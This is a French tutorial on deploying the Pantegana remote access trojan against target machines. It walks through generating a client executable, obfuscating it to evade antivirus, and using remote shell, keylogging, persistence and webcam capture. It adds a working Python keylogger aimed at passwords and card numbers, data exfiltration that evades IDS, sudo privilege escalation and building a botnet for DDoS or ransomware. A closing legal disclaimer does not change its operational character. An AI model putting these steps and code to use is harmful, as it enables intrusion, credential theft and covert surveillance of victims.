🐭 Utilisation de Pantegana - Guide Complet
Pantegana est un outil RAT (Remote Access Tool) avancé conçu pour permettre un contrôle précis et étendu des machines cibles. Ce tutoriel couvre toutes les étapes, de l’installation à l’exploitation avancée, dans un cadre strictement légal et contrôlé.
1️⃣ Pré-requis
- Une distribution Kali Linux ou équivalente.
- Python 3.x installé.
- Git pour cloner les projets.
- Une machine cible dans un environnement de test isolé (VirtualBox ou VMware recommandé).
- Le port d’écoute (par défaut : 8080) ouvert sur votre machine d’attaque.
- Un VPN ou un réseau local sécurisé pour éviter les risques d’exposition.
2️⃣ Installation de Pantegana
Étape 1 : Télécharger Pantegana
Clonez le dépôt GitHub de Pantegana :
git clone https://github.com/Pantegana/pantegana.git
Accédez au répertoire :
cd pantegana
Étape 2 : Installer les dépendances
Assurez-vous que Python et ses bibliothèques nécessaires sont installés :
sudo apt update && sudo apt install python3 python3-pip -y
pip3 install -r requirements.txt
Vérifiez que toutes les dépendances sont bien installées :
pip3 list | grep
Étape 3 : Lancer Pantegana
Pour démarrer l’interface principale de Pantegana :
python3 pantegana.py
L’interface en ligne de commande s’ouvrira avec les options disponibles.
3️⃣ Configuration de Pantegana
Étape 1 : Démarrer un serveur RAT
Configurez un serveur d’écoute pour les connexions entrantes :
python3 pantegana.py --listen --port 8080
- --listen : Active l’écoute des connexions.
- --port : Spécifie le port utilisé (8080 dans cet exemple).
Étape 2 : Générer un Client
Générez un fichier client pour la machine cible :
python3 pantegana.py --generate --host --port 8080 --output client.exe
- --host : Adresse IP de votre machine d’attaque.
- --port : Port d’écoute correspondant à votre serveur RAT.
- --output : Nom du fichier généré.
Obfusquez le payload pour éviter la détection par des antivirus :
pyarmor pack -e " --onefile" client.py
Transférez ce fichier sur la machine cible.
4️⃣ Utilisation de Pantegana
Étape 1 : Établir une connexion
Une fois le fichier client exécuté sur la cible, une connexion sera établie avec votre serveur RAT. Vous verrez l’hôte apparaître dans l’interface.
Étape 2 : Commandes disponibles
Pantegana offre plusieurs commandes pour interagir avec la machine cible :
shell: Accès au terminal distant.screenshot: Capture d’écran à distance.download: Téléchargement de fichiers depuis la cible.upload: Envoi de fichiers vers la cible.keylogger: Activer un enregistreur de frappes.persist enable: Activer la persistance (ex. : démarrage automatique).webcam list: Lister les webcams disponibles.webcam capture: Capturer une image via la webcam.exit: Fermer la session avec l’hôte.
5️⃣ Analyse des Connexions
Surveillez et analysez les connexions établies par Pantegana :
- Utilisez tcpdump pour capturer les paquets réseau :
sudo tcpdump -i eth0 port 8080
wireshark
python3 pantegana.py --listen --tls --port 8443
6️⃣ Scénarios Pratiques de Red Teaming
Scénario 1 : Exfiltration de données via un tunnel chiffré
Simulez l’exfiltration de données sensibles (par exemple, un fichier CSV contenant des logs ou des informations clients) depuis la machine cible tout en évitant la détection par les IDS/IPS.
Voici un exemple d'utilisation d'un tunnel SSH pour exfiltrer les fichiers de manière sécurisée :
# Sur la machine cible, installer un serveur SSH si nécessaire
sudo apt install openssh-server
# Sur la machine d'attaque, créez un tunnel SSH pour exfiltrer les fichiers via SCP
scp -P 22 @:/chemin/vers/fichier /chemin/local/de/sauvegarde
# Ou utilisez rsync pour une exfiltration plus rapide et plus fiable :
rsync -avz -e "ssh -p 22" @:/chemin/vers/fichier /chemin/local/de/sauvegarde
Dans ce scénario, le fichier est transféré via SSH sur un port sécurisé, rendant l’exfiltration plus difficile à détecter. L'utilisation de rsync optimise les performances de transfert.
Scénario 2 : Activation du keylogger pour la collecte d'informations sensibles
Enregistrez les frappes sur la machine cible pour capturer des informations telles que les mots de passe, numéros de carte bancaire, ou autres informations sensibles.
Voici un script Python pour démarrer un keylogger simple :
# Install required package
pip3 install pynput
# Script Python pour capturer les frappes
from pynput.keyboard import Listener
def on_press(key):
try:
with open("keylog.txt", "a") as f:
f.write(str(key.char))
except AttributeError:
with open("keylog.txt", "a") as f:
f.write(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
Ce script va enregistrer toutes les frappes dans un fichier keylog.txt. Vous pouvez l'exécuter sur la machine cible pour capturer les frappes. Ce script est simple mais efficace pour capturer des informations sensibles.
Scénario 3 : Surveillance via la webcam
Utilisez la commande de Pantegana pour activer la webcam de la machine cible et capturer des images en temps réel.
Voici comment procéder pour capturer une image avec la webcam :
# Commande pour lister les webcams disponibles
webcam list
# Commande pour capturer une image de la webcam
webcam capture --device --output webcam_image.jpg
La commande webcam capture permet de prendre des images à distance, ce qui peut être utile dans le cadre d’une surveillance ciblée.
Scénario 4 : Escalade de privilèges via Sudo
Dans ce scénario, vous tentez d'exploiter une vulnérabilité dans la configuration de sudo ou dans un service ayant des privilèges élevés sur la machine cible.
Voici un exemple pour tester si l’utilisateur cible peut exécuter des commandes en tant qu’administrateur sans mot de passe :
# Tester si l'utilisateur peut exécuter des commandes sudo sans mot de passe
sudo -l
# Si la commande renvoie une ligne du type "NOPASSWD: ALL", vous pouvez exécuter n'importe quelle commande avec sudo sans mot de passe
sudo
Si une telle faille est présente, vous pouvez escalader vos privilèges et exécuter des commandes administratives pour avoir un contrôle complet sur le système cible.
Scénario 5 : Créer un botnet avec Pantegana
Ce scénario montre comment utiliser Pantegana pour établir un réseau de machines compromises, permettant de les contrôler simultanément.
Après avoir généré plusieurs fichiers clients et les avoir transférés sur différentes cibles, vous pouvez utiliser l’interface Pantegana pour interagir avec toutes les machines compromises à la fois :
# Lancer l'interface Pantegana
python3 pantegana.py --listen --port 8080
# Une fois la connexion établie avec plusieurs clients, vous pouvez envoyer des commandes à toutes les machines compromises en même temps
# Exemple : capture d'écran sur toutes les machines
screenshot
Ce type de botnet est utilisé pour des attaques par déni de service (DDoS), pour exfiltrer des données à grande échelle ou encore pour diffuser des ransomwares.
7️⃣ Sécurité et Légalités
⚠️ Avertissement : L’utilisation de Pantegana est strictement réservée aux tests dans des environnements autorisés. Toute utilisation non consentie ou illégale constitue une infraction sévèrement punie par la loi.
- Restreignez l’accès au serveur RAT à une plage d’adresses IP autorisées avec iptables :
sudo iptables -A INPUT -p tcp --dport 8080 -s -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8080 -j DROP